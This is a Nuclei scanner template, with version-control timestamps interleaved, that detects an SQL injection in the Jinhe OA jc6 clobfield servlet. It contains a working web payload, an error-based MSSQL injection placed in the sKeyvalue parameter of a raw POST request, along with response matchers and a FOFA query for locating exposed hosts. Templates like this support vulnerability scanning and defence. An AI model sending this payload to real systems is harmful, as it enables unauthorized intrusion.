2023-12-20 10:05:33 +00:00
id : jinhe-jc6-sqli
2023-12-20 05:28:54 +00:00
info :
2023-12-20 10:05:33 +00:00
name : Jinhe OA - SQL Injection
2023-12-20 05:28:54 +00:00
author : Ky9oss
severity : high
description : |
SQL injection vulnerability in the ljc6/servlet/clobfield interface of Jinhe OA jc6. An attacker can obtain sensitive information.
reference :
- https://github.com/wy876/POC/blob/main/%E9%87%91%E5%92%8COA%20jc6%20clobfield%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
- https://blog.csdn.net/qq_41904294/article/details/135074649
metadata :
2023-12-20 10:05:33 +00:00
verified : true
2024-01-14 13:49:27 +00:00
max-request : 1
2023-12-20 05:28:54 +00:00
fofa-query : title="金和协同管理平台"
tags : jinher,jc6,sqli
2023-12-20 10:05:33 +00:00
variables :
num : "{{rand_int(9000000, 9999999)}}"
2023-12-20 05:28:54 +00:00
http :
- raw :
- |
POST /jc6/servlet/clobfield HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2023-12-20 10:05:33 +00:00
key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=11' and CONVERT(int,(select%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27{{num}}%27))))=1 and ''='
2023-12-20 05:28:54 +00:00
matchers-condition : and
matchers :
2023-12-20 10:05:33 +00:00
- type : word
2023-12-20 05:28:54 +00:00
part : body
2023-12-20 10:05:33 +00:00
words :
- "{{md5(num)}}"
- "nvarchar"
condition : and
2023-12-20 05:28:54 +00:00
- type : status
status :
- 200
2024-01-14 14:05:19 +00:00
# digest: 4a0a00473045022100c19147d2bce1f7fbc8803bd71443601210540be4882d7d84c1a7d9942a3b9ada02201c43df219a8cc0e6aff5b0e42357ac00edf763ee97a4d068e60c16f9d08ac5cf:922c64590222798bb761d5b6d8e72950
